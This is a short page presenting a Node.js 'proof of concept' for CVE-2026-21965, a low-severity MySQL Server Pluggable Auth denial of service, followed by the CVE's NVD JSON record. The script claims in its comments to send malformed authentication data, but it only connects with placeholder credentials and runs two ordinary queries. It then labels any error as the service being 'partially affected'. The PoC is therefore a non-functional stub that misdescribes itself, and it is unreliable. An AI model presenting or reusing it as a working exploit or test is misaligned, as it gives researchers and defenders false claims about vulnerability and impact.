CVE-2026-21965

// CVE-2026-21965 PoC - Denial of Service via Pluggable Auth // This PoC demonstrates triggering the vulnerability through malformed auth request // Note: Requires high privileged MySQL user account const mysql = require('mysql2'); // Configuration const target = { host: 'target-server-ip', port: 3306, user: 'high_privilege_user', // Requires high privilege password: 'password' }; async function triggerVulnerability() { console.log('[+] Connecting to MySQL Server...'); try { const connection = await mysql.createConnection(target); console.log('[+] Connected successfully'); // Attempt to trigger the Pluggable Auth vulnerability // by sending malformed authentication data console.log('[+] Sending malformed authentication request...'); // Execute queries that interact with Pluggable Auth // This may trigger the DoS condition await connection.query('SELECT 1'); console.log('[+] Query executed'); console.log('[*] Check if MySQL service is experiencing partial DoS'); // Verify service availability try { await connection.query('SELECT VERSION()'); console.log('[-] Service still responding'); } catch (err) { console.log('[+] Service partially affected: ' + err.message); } await connection.end(); } catch (error) { console.error('[-] Error: ' + error.message); } } triggerVulnerability();

{"cve": {"id": "CVE-2026-21965", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:59.487", "lastModified": "2026-01-29T15:27:45.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}, {"lang": "es", "value": "Vulnerabilidad en el producto MySQL Server de Oracle MySQL (componente: Servidor: Pluggable Auth). Las versiones compatibles que están afectadas son 9.0.0-9.5.0. Una vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios con acceso a la red a través de múltiples protocolos comprometer MySQL Server. Los ataques exitosos de esta vulnerabilidad pueden resultar en la capacidad no autorizada de causar una denegación de servicio parcial (DoS parcial) de MySQL Server. Puntuación base CVSS 3.1 de 2.7 (Impactos en la disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndIncluding": "9.5.0", "matchCriteriaId": "80A941A0-B16F-477B-9062-EF768F4CAAD4"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}